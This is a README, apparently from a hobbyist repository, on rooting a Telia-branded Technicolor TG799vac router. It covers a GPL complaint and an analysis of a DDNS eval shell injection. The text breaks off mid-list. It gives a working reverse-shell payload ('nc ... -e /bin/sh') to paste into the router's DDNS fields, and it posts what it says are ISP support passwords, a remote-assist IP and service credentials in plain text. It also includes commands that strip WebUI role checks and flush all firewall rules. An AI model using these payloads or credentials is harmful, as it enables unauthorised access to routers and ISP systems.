TG799VAC XTREME 17.2 MINT

My personal unique wiki for hacking the router firmware used by (Telia) TG799vac Xtream v17.2-MINT delivered from Technicolor


# TG799VAC-XTREME-17.2-MINT

Autism in all its glory, greetings to our friend, you have all my respect of course, keep up the good work mate: @weaponizedautism


The first thing I want to do in this README is to send a message directly to Cygate, TeliaCompany AB and Technicolor.

This README was created because you blacklisted me AND because of the violations of the GNU licenses for technicolor, motorola and sagemcom devices that you committed. I asked several times without getting access to the source code from any of you; you didn't even reply, and your support just ignored me and said "I will pass this message on, we will get back to you as soon as we can" for 5 years now, without any reply, lol.

When you release your software under the GPL, it means you give anyone a license to use your software under some terms and agreements.

If somebody violates the agreement, they are in breach of contract with you. This means I can sue them in a court of law. Please read more about GPL violations and respect all the developers who have made it possible for you to deliver; whoever behaves like this has of course no right to be left alone, so blame yourselves, idiots.

It's not the first time; this README was created 5 years ago and these companies STILL violate the GPL. For example, I found this from January 2022:

Technicolor provides modem-routers to several ISPs around the world; they all have good hardware, and the firmware, Homeware, is based on OpenWrt, so they have to provide their GPL source code.

On the Technicolor website there is a dedicated section to request the GPL source code; it can be reached at this page, where they offer to send their open source code to everyone who gets in touch with them by writing to the address [email protected].

Everything seems so simple, but unfortunately it isn't, because Technicolor doesn't always answer GPL source code requests, and several people reported this in the OpenWrt forum in this thread.

Personally I have two bad experiences with them.

In March 2020 I wrote to Technicolor asking for the Homeware 18 GPL source code for a device, but after several months without an answer, in May 2020 I wrote to [email protected] to report what was happening, and in the end Technicolor provided me the requested GPL source code in June 2020. I don't know whether Technicolor sent me the GPL source code because I wrote to the Software Freedom Conservancy or not.

In September 2021 I wrote to Technicolor asking for the Homeware 19 GPL source code for another device; because there was no answer, in October 2021 I wrote to [email protected] to report the situation, and to the present day I still have not received either the GPL source code or any answer. I'll continue writing an email to `Technicolor` every week; I have the right to receive the GPL source code.

Source for above message: Technicolor violates OpenWrt GPL License

More info, and some people who are doing a really great job, can be found in this thread: Technicolor GPL Source Code Request

Important Update (2018 Exploit) - Written 2023-08-05:

Five years have passed since the 2018 Exploit in our router system, and throughout this period, I have diligently searched for a comprehensive explanation concerning the exact cause of the exploit. Regrettably, all available information seems to be riddled with speculations and lacks a definitive account. In an effort to bring closure to this matter, I have decided to take matters into my own hands and provide a detailed account of the incident.

I am providing an important update regarding the 2018 Exploit that occurred five years ago. Today, on August 5, 2023, I am finally able to address this issue and provide the detailed explanation that was missing at the time.

Back in 2018, an exploit was discovered in our ISP's router system, and due to unforeseen circumstances and time constraints, I was unable to offer a comprehensive explanation for the incident. However, I have now taken the time to thoroughly review our records and want to share the missing details with you.

Better late than never, right? I apologize for the delay, but I want to ensure that everyone is well-informed about what happened and the measures I took to resolve the situation.

It is crucial to highlight that the root cause of the exploit does not revolve around IP addresses' inadequate sanitization, as some sources suggest. Instead, I firmly argue that the primary issue lies in the improper use of shell scripting, particularly the highly dangerous eval function. Utilizing eval without caution poses significant security risks, and it is imperative to exercise extreme care when deploying it in any context.

Through this updated disclosure, I aim to shed light on the true cause behind the exploit and foster a better understanding of the risks involved with certain scripting practices. Today, while exploring another kind of exploit, I was reminded of this repository created 5 years ago. Coincidentally, I received specific questions about shell injection from various students, and the significance of this issue resurfaced in my mind. This prompted me to conduct further investigations and provide a comprehensive explanation for the exploit that occurred in this router system back in 2018.

Therefore, I'm taking this opportunity to complete the README with the missing details, so everyone is aware of what happened and what actions were taken to address the situation.

Shell Injection Vulnerability in Dynamic DNS Script - A Detailed Analysis

It has been some time since my initial investigation, and I have struggled to find any comprehensive explanations regarding the reason behind the possibility of injecting shell code in the Dynamic DNS script used by Technicolor routers. While some sources suggest it might be due to inadequate sanitization of IP addresses, I argue that the root cause lies in the improper use of shell scripting, particularly the highly dangerous eval function. There's a compelling reason why eval should be handled with extreme caution and, if used, thoroughly tested in every context.

In this report, I aim to shed light on the vulnerability by providing a detailed analysis of the code, pinpointing the specific flaw, and discussing the potential risks and impact. The primary focus will be on the misguided use of eval and the implications it has on system security.

As with the previous case involving the 'ping' version, this incident serves as yet another cautionary tale highlighting the dangers of improper coding practices and the potential consequences of relying on eval for executing dynamic code. A fundamental understanding of the risks associated with eval and rigorous data validation practices are critical to ensure the robustness and security of any script.

The following is the detailed report of the vulnerability, including the code snippet where the flaw resides, as well as my thorough analysis and recommended mitigation strategies.

Shell Injection Vulnerability in Dynamic DNS Script - Part 1

I discovered a potential security vulnerability in the Dynamic DNS script (dynamic_dns_updated.sh) used by Technicolor routers. The vulnerability arises from the improper use of eval, which can lead to Shell Injection and potentially allow an attacker to execute arbitrary commands on the system.

Background

The Dynamic DNS script is designed to update the DNS records for the router, allowing it to be accessed via a domain name rather than a dynamic IP address. However, in the script, eval is used to evaluate a string that contains user-provided or dynamically generated data. This can lead to unexpected command execution if the input is not properly sanitized.

Vulnerable Code

The vulnerable part of the code can be found in /usr/lib/ddns/dynamic_dns_functions.sh and is invoked from dynamic_dns_updated.sh. Specifically, the problematic code snippet is as follows:

__RUNPROG="$NSLOOKUP $lookup_host $dns_server >$DATFILE 2>$ERRFILE"
while : ; do
    write_log 7 "#> $__RUNPROG"
    eval $__RUNPROG
    __ERR=$?
    # ... continuation of the code ...
done

Analysis

  1. The script constructs the command to be executed in the __RUNPROG variable, which includes output redirection (>) and error redirection (2>).

  2. The script then uses eval to execute the command stored in __RUNPROG. Since eval evaluates the entire string, including the redirection instructions, it can lead to the execution of unintended commands.

  3. An attacker, as you all know, could potentially manipulate the input values ($lookup_host or $dns_server) to include malicious commands or modify the redirection instructions. This can result in arbitrary code execution on the system, and so it did.

Mitigation

To mitigate the Shell Injection vulnerability, it is essential to properly validate and sanitize all user-provided or dynamically generated data before using it in eval or any other commands. Avoid using eval whenever possible, as it introduces complexity and increases the risk of security flaws.

Conclusion

The improper use of eval in the Dynamic DNS script can lead to a Shell Injection vulnerability, potentially exposing the system to unauthorized access and arbitrary code execution. By carefully validating and sanitizing input data and avoiding the use of eval


Detailed Analysis of the Vulnerable Code - Part 2

In the context of the Dynamic DNS script, the following code snippet is found:

+ eval /usr/bin/nslookup ::::::;nc 192.168.1.96 1337 -e /bin/sh >/var/run/ddns/myddns_ipv4.dat 2>/var/run/ddns/myddns_ipv4.err
+ /usr/bin/nslookup ::::::
nslookup: can't resolve '::::::': Name or service not known
+ nc 192.168.1.96 1337 -e /bin/sh
+ __ERR=1

The sequence of events begins with the use of eval, which evaluates the entire string that follows. The first part of the string is the nslookup command, attempting to resolve the invalid domain name "::::::". As expected, nslookup fails with the error message "nslookup: can't resolve '::::::': Name or service not known."

After the failed nslookup, the script proceeds to the next part of the evaluated string, which is the nc (netcat) command. The nc command attempts to connect to IP address 192.168.1.96 on port 1337 and execute a shell (/bin/sh) over the connection.

However, due to the failure of the nslookup command, the nc command does not execute. This is evident from the log, where nc is not triggered and the error variable __ERR is assigned the value 1.

The critical concern here is the use of eval, which merges multiple commands into a single command line. As a result, the nc command, which poses a significant security risk, is chained together with the failed nslookup command.

Potential Consequences Without eval

IMPORTANT: Without eval, the nslookup and nc commands would be executed independently. If eval were not used, the sequence would look like this:

/usr/bin/nslookup ::::::
nslookup: can't resolve '::::::': Name or service not known

The failed nslookup command would return the error message as before, but the nc command would not run. This is because the nc command is not directly related to the nslookup command; hence, there is no attempt to execute it after the nslookup failure.

As a result, without eval, the potential security risk of chaining nc with nslookup is avoided.

Conclusion

The presence of eval in the script leads to the dangerous combination of commands, which in turn creates a Shell Injection vulnerability.

Avoiding the use of eval and implementing robust data validation practices are critical steps in securing the script and preventing vulnerabilities like Shell Injection.
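The mitigation Part 1 asks for (validate the values, stop using eval) and the command chaining Part 2 describes can be shown together in one script. The script below is an added example written for this README; it is not the Technicolor ddns code and not from the original repository. The function names is_safe_host and run_lookup are invented; NSLOOKUP, DATFILE and ERRFILE mirror the variables in the vulnerable snippet but default to hypothetical paths under /tmp.

```shell
#!/bin/sh
# Added example for this README, not the Technicolor ddns code: the lookup
# step rewritten without eval, with an allow-list check on the two values
# that came from the WebUI. Names is_safe_host/run_lookup are invented;
# NSLOOKUP, DATFILE and ERRFILE mirror the variables in the vulnerable
# snippet and default to hypothetical paths.
NSLOOKUP=${NSLOOKUP:-/usr/bin/nslookup}
DATFILE=${DATFILE:-/tmp/ddns_example.dat}
ERRFILE=${ERRFILE:-/tmp/ddns_example.err}

# is_safe_host VALUE: accept only characters a DNS name or an IPv4/IPv6
# literal can contain and require at least one letter or digit. Shell
# metacharacters (';', '|', '&', '$', '>', quotes, whitespace) never pass,
# so a value cannot carry a second command or an extra redirection.
# This is stricter than the original script, which checked nothing here.
is_safe_host() {
    case "$1" in
        "")                 return 1 ;;  # empty
        *[!A-Za-z0-9.:-]*)  return 1 ;;  # any character outside the allow-list
        *[A-Za-z0-9]*)      return 0 ;;  # has at least one letter or digit
        *)                  return 1 ;;  # only dots/colons/hyphens, e.g. "::::::"
    esac
}

# run_lookup LOOKUP_HOST [DNS_SERVER]: the same command the ddns loop
# assembled into __RUNPROG, but executed directly. The redirections are
# part of this script, and each argument reaches nslookup as one word
# whatever it contains; eval never sees the data.
run_lookup() {
    lookup_host=$1
    dns_server=$2
    if ! is_safe_host "$lookup_host"; then
        echo "rejected lookup_host: $lookup_host" >&2
        return 2
    fi
    if [ -n "$dns_server" ] && ! is_safe_host "$dns_server"; then
        echo "rejected dns_server: $dns_server" >&2
        return 2
    fi
    "$NSLOOKUP" "$lookup_host" ${dns_server:+"$dns_server"} >"$DATFILE" 2>"$ERRFILE"
}

# Demonstration on constructed values (no resolver needed for this part).
for v in "example.com" "2001:db8::1" "example.com;id" "::::::"; do
    if is_safe_host "$v"; then echo "accepted: $v"; else echo "rejected: $v"; fi
done
```

The difference from the original loop is that the command is never turned into a string: the shell parses the fixed line in the script, so a value containing ';' would be handed to nslookup as a single odd-looking argument instead of being parsed as a second command, and the allow-list rejects such a value before that anyway. Set NSLOOKUP=echo to exercise run_lookup on a machine without nslookup.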

Repository's Purpose and Explanation

This repository exists as an essential historical record and learning resource. It aims to provide insights into the 2018 Exploit that affected our ISP's router system. While the exploit has been fixed and no longer poses a threat in current firmware versions, it may still be relevant for educational purposes or for those who wish to explore past vulnerabilities.

Warning Never forget and please remember that attempting this exploit on any active or unauthorized network is strictly prohibited and may have legal consequences. The information presented here is solely intended for educational and research purposes, and wuseman can never be held responsible for other use cases. Remember that!

  • Everything below this line is from the readme that was created back in the day; the 2023 disclosure ends here.

These are pictures I took over a 5 year period; I've probably had over 20 different devices and I've tried everything and then some during these years with these routers. It's been fun, but I've now chosen to archive this repo.

VBNT-H


2015-2022 - The End

Bonus

This is unique and I'm not going to share how I got hold of these, but at least here are the login credentials in plain text for these devices, used for "support" in case the ssh key doesn't work.

TeliaCompany AB - User-Agents:

IpTV............: KreaTVWebKit/600 (Motorola STB; Linux; 5305)
Server..........: Apache-Coyote/1.1
Cisco Switch....: Wget   
WEB.............:  

Default password for TeliaCompany AB employees

Old Password....: _T3L1a!SuPPor7   
New Password....: SUPP0r7!W1f1R0uT3r
Remote IP.......: 131.116.22.242
Remote IP.......: uci show mwan.remoteassist.dest_ip

Default Shell Password on TG799Vac devices from TeliaCompany AB

Login...........: root
Password........: root

WebUi Assistance Password

Login...........: assistance                  (uci get web.remote)
Password........: random                      ()
Port............: 60443                       (uci get web.remote.port)
Interface.......: mgmt                        (uci get web.remote.interface)
Enable..........: uci set web.remote.active=1
Disable.........: uci set web.remote.active=0

Ngwfdd credentials

Login...........: telia
Password........: ZDgFbBH5jQvUocL7
Remote IP.......: .
Remote DNS......: telia-gw.tgwfd.org
Remote Port.....: 8443
Via Shell.......: uci get ngwfdd.config.base_url
Full URL........: https://telia:[email protected]:8443/

Other repositories similar to this one that I have been working on over the years

Cisco...........: https://cisco.nr1.nu/
Sagemcom........: https://sagemcom.nr1.nu/
Technicolor0....: https://technicolor.nr1.nu/    
Technicolor1....: https://github.com/wuseman/TG799vnv2-10.5.1.Q-SMART-3.6.1
Technicolor2....: https://github.com/wuseman/TG799VAC-XTREAM-V16.2-JADE
Technicolor4....: https://github.com/wuseman/TG799VAC-XTREME-17.2-MINT

First of all I want to warn you straight away, so you know what not to do if you don't know exactly what you are doing: you always want to use bank_1 as the active bank and never bank_2. You have been warned.

VALID

echo "bank_1" > /proc/bankversion/active

DANGEROUS

echo "bank_2" > /proc/bankversion/active 

Boards

TeliaCompany AB - Board: VANT-W

Screenshot

TeliaCompany AB - Board: VANT-R

Screenshot

  • Download URLS:

https://github.com/hack-technicolor/hack-technicolor/blob/master/torrents/vant-r/15516436r1361008closed.rbi.torrent?raw=true

TeliaCompany AB - Board: VBNT-H

Screenshot

TeliaCompany AB - Board: VDNT-O

Screenshot

SSH and Dropbear access

  • SHORT VERSION

Screenshot

  • Please wait 20-30 seconds before trying to ssh into your router
  • Connect to the router: 'ssh root@192.168.1.1'
  • Default password: root
  • You now have shell access with full root privileges.
  • Copy and paste all of this into the dyndns field in the webgui (edit ip):
::::::;nc 192.168.1.144 1337 -e /bin/sh

LONG VERSION:

Screenshot

  • Let's begin. Fire up a terminal of any kind, run the awesome netcat tool and listen on a port:
nc -lvvp 1337
  • Go to the WAN Services and press SHOW ADVANCED. In the username, password and domain fields you need to type the command below; after that, just enable the dyndns. It won't matter which hoster you choose, just pick one, press save and wait 4-5 seconds, and you have full root access to your TG799VAC Xtreme 17.2 Mint. Check the preview video above if you do not understand.
:::::::;nc [machine_IP] 1337 -e /bin/sh
  • You will see something similar, and if you see this then you have root access; type ls / for example:
listening on [any] 1337 ...
connect to [192.168.1.144] from router [192.168.1.1] 40980

OpenWRT Package Manager

  • Below commands will give you a working opkg setup, copy and paste:

Screenshot

rm /etc/opkg/distfeeds.conf
cat << "EOF" > /etc/opkg/customfeeds.conf
src/gz chaos_calmer_base http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/base
src/gz chaos_calmer_packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/packages
src/gz chaos_calmer_luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/luci
src/gz chaos_calmer_routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/routing
src/gz chaos_calmer_telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/telephony
src/gz chaos_calmer_management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/management
EOF
cat << "EOF" > /etc/opkg.conf
arch all 1
arch all 100
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10
arch brcm63xx 200
arch brcm63xx-tch 300
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
EOF
  • Update repositories and install sftp-server
opkg update
opkg install openssh-sftp-server
ash -c /usr/libexec/sftp-server
#opkg list-upgradable|cut -d' ' -f1|xargs opkg upgrade

Configure Dropbear so we get shell access via Openssh

  • Harden security by disabling password authentication.
### Dropbear MGMT Configuration (backdoor, enable it if you need support otherwise leave it off)
uci set dropbear.mgmt.enable=0
uci set dropbear.mgmt.PasswordAuth=off
uci set dropbear.mgmt.RootPasswordAuth=off
uci set dropbear.mgmt.Port=22
uci set dropbear.mgmt.Interface=mgmt
uci set dropbear.mgmt.AllowedClientIPs=131.116.22.242/32
### Dropbear WAN Configuration
uci set dropbear.wan.enable=0
uci set dropbear.wan.PasswordAuth=off
uci set dropbear.wan.RootPasswordAuth=off
uci set dropbear.wan.Interface=wan
uci set dropbear.wan.AllowedClientIPs=131.116.22.242/32
### Dropbear LAN Configuration (the only instance left enabled, and the only one with password auth)
uci set dropbear.lan.enable=1
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci set dropbear.lan.Interface=lan
uci set dropbear.lan.IdleTimeout=3600
uci set dropbear.lan.SSHKeepAlive=0
uci set dropbear.lan.Port=22
uci set dropbear.lan.BannerFile=
uci set dropbear.lan.RootLogin=1
uci set dropbear.lan.GatewayPorts=
uci set dropbear.lan.rsakeyfile=
uci set dropbear.lan.mdns=0
uci set dropbear.lan.MaxAuthTries=2
  • Setup proper permissions for Dropbear path:
chmod -R u=rwX,go= /etc/dropbear
  • Apply changes and restart dropbear
uci commit
/etc/init.d/dropbear restart
  • Add your ssh key:
ssh root@192.168.1.1 "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub
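The uci lines above switch password logins off on the mgmt and wan instances and keep them on for lan only. As an added example (not part of the original README or of the device firmware), the script below audits a dump in the format `uci show dropbear` prints and flags any dropbear instance that is enabled on a non-LAN interface with password authentication on, or that has no low MaxAuthTries. The sample dump and the function names audit_dropbear and uci_get are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original README or the Technicolor firmware:
# audit the dropbear uci settings this section configures. Input is a dump
# in "uci show dropbear" format; the sample below is constructed and shows
# the mgmt "backdoor" instance still enabled with password auth on.
SAMPLE_UCI=$(cat <<'EOF'
dropbear.mgmt=dropbear
dropbear.mgmt.enable='1'
dropbear.mgmt.Interface='mgmt'
dropbear.mgmt.PasswordAuth='on'
dropbear.mgmt.RootPasswordAuth='on'
dropbear.wan=dropbear
dropbear.wan.enable='0'
dropbear.wan.Interface='wan'
dropbear.wan.PasswordAuth='off'
dropbear.lan=dropbear
dropbear.lan.enable='1'
dropbear.lan.Interface='lan'
dropbear.lan.PasswordAuth='on'
dropbear.lan.RootPasswordAuth='on'
dropbear.lan.MaxAuthTries='2'
EOF
)

# uci_get DUMP SECTION OPTION: print the quoted value of one option, or
# nothing if the option is absent from the dump.
uci_get() {
    printf '%s\n' "$1" | sed -n "s/^dropbear\\.$2\\.$3='\\(.*\\)'\$/\\1/p"
}

# audit_dropbear DUMP: print one finding per line; the return value is the
# number of findings (0 means nothing was flagged).
audit_dropbear() {
    dump=$1
    findings=0
    for sec in mgmt wan lan; do
        en=$(uci_get "$dump" "$sec" enable)
        [ "$en" = "1" ] || continue          # disabled instances are fine
        iface=$(uci_get "$dump" "$sec" Interface)
        pw=$(uci_get "$dump" "$sec" PasswordAuth)
        rootpw=$(uci_get "$dump" "$sec" RootPasswordAuth)
        tries=$(uci_get "$dump" "$sec" MaxAuthTries)
        # mgmt and wan are reachable from outside the home network, so a
        # password login there is the combination this section turns off.
        if [ "$iface" != "lan" ] && [ "$pw" = "on" ]; then
            echo "WARN $sec: password auth enabled on non-LAN interface $iface"
            findings=$((findings + 1))
        fi
        if [ "$iface" != "lan" ] && [ "$rootpw" = "on" ]; then
            echo "WARN $sec: root password login enabled on $iface"
            findings=$((findings + 1))
        fi
        if [ -z "$tries" ] || [ "$tries" -gt 3 ]; then
            echo "INFO $sec: MaxAuthTries unset or above 3"
            findings=$((findings + 1))
        fi
    done
    return "$findings"
}

# On the device: audit_dropbear "$(uci show dropbear)"
audit_dropbear "$SAMPLE_UCI" || echo "findings: $?"
```

Run it against the real device with `audit_dropbear "$(uci show dropbear)"` after `uci commit`; with the configuration from this section applied, only the lan instance is enabled and the audit returns 0.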

WebUI

There are many settings in the .lp files in the web directory that deny 'admin' from editing settings; see the example below and how it is possible to get access to all settings as admin without changing role.

Example:

Inside /www/docroot/cards/snippets/002_broadband_xdsl.lp:

if session:getrole() == "superuser" or session:getrole() == "telia" then
  • Dry run: print all relevant settings that would be changed (for your reference):
find /www -type f -exec sed -n '
    /can\(Add\|Apply\|Edit\|Remove\|Delete\) = / s/false/true/p
' {} +
  • Apply the settings
find /www -type f -exec sed -i '
    /can\(Add\|Apply\|Edit\|Remove\|Delete\) = / s/false/true/
' {} +
  • Run the below to get access to all settings:
find /www -type f -exec sed -i 's/"telia"/"admin"/g'  {} \;
find /www -type f -exec sed -i 's/"superuser"/"admin"/g'  {} \;
find /www -type f -exec sed -i 's/"engineer"/"admin"/g'  {} \;
  • Copy and paste the below to get full access to the webUI and all the cards that exist:
for missed_roles in $(uci show|grep '\.roles'|grep -v admin|cut -d'=' -f1|sed 's/$/=admin/g'); do
    uci add_list ${missed_roles};
done
  • It is required to restart nginx:
/etc/init.d/nginx restart
  • Enjoy! You are now superduper admin on your own router.

Session and Tokens

  • Get the CSRF token via cli:
curl -sL http://192.168.1.1/login.lp?action=getcsrf
  • Get the CSRF token via your browser's developer console:
/*Open prefered browser
Press F12
Go to Console tab
Paste below*/
$("meta[name=CSRFtoken]").attr("content")

Tokens/Sessions/Auth/Login

Advanced notes about how we understand the auth processes, and more interesting stuff about the WebUI

To understand how tokens/sessions/proxy stuff works on the router when logging in via the WebUI, a good thing is to read the comments in the source. Below are some examples with comments you can use to understand how this is handled once you have root access; you often get a pretty good overview of things that way.

This is what we should have access to, so it will be bonus after bonus!

This is the greatest pleasure of hacking different kinds of devices in my opinion: seeing how the "best" (they probably think so) write things, to get better knowledge of how to hack things in the future. They really work hard so that we don't get full access to our devices, noobs.

-- Change SRP parameters and crypted password of the current user of this session.
-- @param salt A newly generated SRP salt for the updated password
-- @param verifier A newly calculated SRP verifier for the generated salt and updated password
-- @param cryptedpassword A newly calculated crypted password. This parameter is optional,
-- set to nil if CLI password update is to be omitted
-- @return true or nil, error message

  local proxy = {
    getusername = getusername,
    isdefaultuser = isdefaultuser,
    toggleDefaultUser = toggleDefaultUser,
    getrole = getrole,
    store = store,
    retrieve = retrieve,
    logout = logout,
    hasAccess = hasAccess,
    getCSRFtoken = getCSRFtoken,
    checkCSRFtoken = checkCSRFtoken,
    addUserToManager = addUserToManager,
    delUserFromManager = delUserFromManager,
    reloadAllUsers = reloadAllUsers,
    changePassword = changePassword,
    getUserCount = getUserCount
  }

     __metatable = "ah ah ah, you didn't say the magic word"
  • Session/SessionManager
/usr/lib/lua/web/session.lua
/usr/lib/lua/web/ssessioncontrol.lua
/usr/lib/lua/web/ssessionmgr.lua
  • Sockets are stored in /usr/lib/lua/socket dir
/usr/lib/lua/socket/core.so
/usr/lib/lua/socket/headers.lua
/usr/lib/lua/socket/http.lua
  • Sessions and cookies are generated by the files in the folder above; an excerpt from http.lua:
local _M = socket.http
_M.TIMEOUT = 60
_M.PORT = 80
_M.USERAGENT = socket._VERSION
-- Reads MIME headers from a connection, unfolding where needed
function _M.open(host, port, create)
    h.try(c:settimeout(_M.TIMEOUT))
    h.try(c:connect(host, port or _M.PORT))
    if not reqt.proxy and not _M.PROXY then
    local proxy = reqt.proxy or _M.PROXY
        ["user-agent"] = _M.USERAGENT,
    port = _M.PORT,
    local h = _M.open(nreqt.host, nreqt.port, nreqt.create)
_M.request = socket.protect(function(reqt, body)
return _M

There are quite limited tools on the device, so if you want to add your own user in an elegant and correct way you can do this:

  • Add your own user without any extra tools

  • Since chpasswd is available, you can set passwords with one of the examples below; if you use the default chpasswd on the device, the password won't be encrypted.

  • Method 1 (not encrypted - execute this directly on the device)

echo username:passwordYouWantToUse|chpasswd
  • Method 2 (des, md5, sha256, sha512)

Since neither perl or openssl is default installed, you can use your own linux pc for encrypting and salting the password for your user

  • chpasswd with -e takes an already hashed password (generate the hash with one of the commands below and paste it in place of HASH):
echo "username:HASH" | chpasswd -e

or from another pc, this is another example via perl and openssl

perl -e 'print crypt("passwordYouWantToUse", q($6$xyz$)), "\n"'   # $6$ selects sha512, xyz is the salt
  • Method 3 (md5, sha256, sha512)

Passing -1 will generate an MD5 password, -5 a SHA256 and -6 SHA512 (SHA512 is of course what I recommend)

openssl passwd -6 -salt xyz  passwordYouWantToUse

Screenshot

BootP/TFTP

Screenshot

  • Client wise:

Switch device power off (or pull the power cord).

Connect a client to the device via Ethernet to LAN1, trigger the rescue function by pressing and holding the reset button of the device and then turning the device on (or plug in the power cord).

You can release the reset button after a few seconds.

The device will take ~15-20 seconds to boot a mini-web server, that provides only a single function: it can upload a firmware file and has a button to trigger the flash process.

The web-server will usually be available under either (if in doubt, try both)

http://192.168.1.1

Install atftpd on a Gentoo Machine (OpenRC)

emerge --sync
emerge -a atftpd
mkdir /mnt/tftp
cp <firmware.bin> /mnt/tftp/
chown nobody:nogroup -R /mnt/tftp
cat << "EOF" > /etc/conf.d/atftp
TFTPD_ROOT="/mnt/tftp"
TFTPD_OPTS="--daemon --user nobody --group nobody"
EOF
/etc/init.d/atftpd start
  • That's it. Now use getent on the client to confirm the tftp service is known:
getent services tftp

Server Wise (router)

uci set dhcp.dnsmasq.enable_tftp='1'
  • First you need to setup a static ip to be able to communicate with router:
ifconfig eth0 192.168.1.2 netmask 255.255.255.0 up 
route add default gw 192.168.1.1
echo "nameserver 192.168.1.1" > /etc/resolv.conf
tcpdump -i enp0s31f6 -vvv -s 0 port bootps
  • When the TG799 router reports BOOTP, run the command below:
atftp \
    --trace \
    --option "timeout 1" \
    --option "mode octet" \
    --put \
    --local-file tg799bin.firmware.rbi \
    192.168.1.1

Got stuck with some packages that say "error opening terminal"? No worries, this is caused by colors. Run the command below to fix the xterm problem:

Screenshot

Old Stuff (Various)

  • Run uci-whois.sh from scripts dir to whois all ip's that your isp added for various settings:

Screenshot

  • Mount root as read and write:

mount -o remount,rw /
  • If you want to sort all settings by file, do as below:

Screenshot

mkdir /tmp/uci_sorted;
cd /tmp/uci_sorted;

for uci_settings in $(uci show | awk -F. '{print $1}' | uniq); do
    uci show ${uci_settings} > /tmp/uci_sorted/${uci_settings};
done
  • List all files where password, pass and/or key is readable in ascii:
find /usr/ -type f -exec grep -Eil "pass|password|key" {} +
  • List all files (binaries included) where password, pass and/or key appears as a printable string:
find /usr/ -type f -exec strings -f -n 8 {} + | grep -Ei "pass|key"
  • Turning off Power-Saving features
pwrctl config --cpuspeed 0
pwrctl config --wait off
pwrctl config --ethapd off
pwrctl config --eee off
pwrctl config --autogreeen off
  • Configure DDNS via cli:
cat << "EOF"  > /etc/config/ddns 
config service 'myddns_ipv4'
    option interface 'wan'
    option ip_source 'network'
    option ip_network 'wan'
    option use_https '1'
    option cacert 'IGNORE'
    option force_interval '36500'
    option force_unit 'days'
    option enabled '1'
    option password 'password'
    option username 'domain.com'
    option service_name 'loopia.se'
    option lookup_host 'domain.com'
    option domain 'domain.com'
EOF
  • List all URLs for your firmware that can be downloaded:

This part has its own repository now

strings /etc/cwmpd.db
    SQLite format 3
    tabletidkvtidkv
    CREATE TABLE tidkv (  type TEXT NOT NULL,  id TEXT NOT NULL,  key TEXT NOT NULL,  value TEXT,  PRIMARY KEY (type, id, key)))
    indexsqlite_autoindex_tidkv_1tidkv
    transferPassword5
    transfer Username
    Stransfer URLhttp://192.168.21.52:7547/ACS-server
    5transferaStartTime2018-08-19T15:20:13Z
    transfera FaultStringcomplete
    transfera FaultCode0M_
    M%5transfera CompleteTime2018-08-19T15:19:57Z
    'transfera TimeStamp244,9XXXXXX
    transfera DelaySeconds3
    transfera Password
    transfera Username
    runtimevarParameterKey#
    runtimevarConfigurationVersionD
    %_runtimevarBootStrappedhttps://acs.telia.com:7575/ACS-server/ACS-
     +/VersionsSoftwareVersion16.2.XXXXXX
    transfer FaultString
    transfer FaultCode
    transfer TimeSt6
    transfera UsernameU
    transfera URLT7
    transfera TimeStampX
    transfera SubStatec
    transfera Stateb7
    transfera StartTimed
    transfera PasswordV
  • List network devices:
awk '{print $1}' /proc/net/dev
  • Disable all firewall rules (until you reboot or reload):
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
  • Changing max sync speed on your modem:
uci set xdsl.dsl0.maxaggrdatarate='200000' # 16000 default
uci set xdsl.dsl0.maxdsdatarate='140000'   # 11000 default
uci set xdsl.dsl0.maxusdatarate='60000'    # 40000 default
  • Enable or disable dnsmasq on lan:
uci set dhcp.lan.ignore='1'   # '1' ignores lan (disabled), '0' enables it again
  • Enable or Disable network time server:
uci set system.ntp.enable_server='1'
  • Edit nsplink to something else (where you get redirected when you click the logo at the top):
uci set web.uidefault.nsplink='https://wuseman.nr1.nu'
  • This will show all traffic on your router with netstat:
netstat -tulnp
  • This will show all IP addresses connected to your router at the moment:
netstat -lantp \
    |grep ESTABLISHED \
    |awk '{print $5}' \
    |awk -F: '{print $1}' \
    |sort -u
  • Capture traffic on one interface and pipe it straight into Wireshark (change -i to pick the interface, e.g. wl0 for wifi):

Sniff network traffic on 6rd-6rd interface

ssh root@router tcpdump -i 6rd-6rd -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on atm_iptv interface

ssh root@router tcpdump -i atm_iptv -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on atm_mgmt interface

ssh root@router tcpdump -i atm_mgmt -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on atm_voip interface

ssh root@router tcpdump -i atm_voip -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on atm_wan interface

ssh root@router tcpdump -i atm_wan -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on bcmsw interface

ssh root@router tcpdump -i bcmsw -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on br-hotspot interface

ssh root@router tcpdump -i br-hotspot -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on br-lan interface

ssh root@router tcpdump -i br-lan -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on br-wan interface

ssh root@router tcpdump -i br-wan -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on dsl0 interface

ssh root@router tcpdump -i dsl0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on eth0 interface

ssh root@router tcpdump -i eth0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on eth1 interface

ssh root@router tcpdump -i eth1 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on eth2 interface

